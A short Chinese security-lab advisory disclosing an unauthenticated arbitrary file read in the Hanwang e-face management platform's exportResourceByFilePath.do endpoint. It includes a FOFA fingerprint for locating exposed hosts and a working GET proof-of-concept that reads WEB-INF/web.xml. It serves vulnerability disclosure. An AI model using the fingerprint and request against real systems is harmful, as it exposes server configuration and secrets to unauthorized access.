汉王e脸通综合管理平台 exportResourceByFilePath.do 任意文件读取漏洞
原文链接: https://mp.weixin.qq.com/s?__biz=Mzk5MDYxODcwMA==&mid=2247483950&idx=1&sn=970c288f654adcdc1315375a64c0b374
汉王e脸通综合管理平台 exportResourceByFilePath.do 任意文件读取漏洞
原创 zz 星络安全实验室 2025-07-20 07:11
|
漏洞详情:
汉王e脸通综合管理平台的exportResourceByFilePath.do接口存在未授权文件读取安全缺陷。攻击者能够绕过身份验证机制,通过精心构造的请求参数向该接口提交任意系统文件路径,从而导致服务器敏感信息被非法获取,严重威胁系统数据安全性和完整性
漏洞复现:
fofa:
icon_hash="1380907357"
poc:
GET /manage/leaveList/exportResourceByFilePath.do?filePath=WEB-INF/web.xml HTTP/1.1
Host:xx
修复意见:
关注厂商动态,升级至安全版本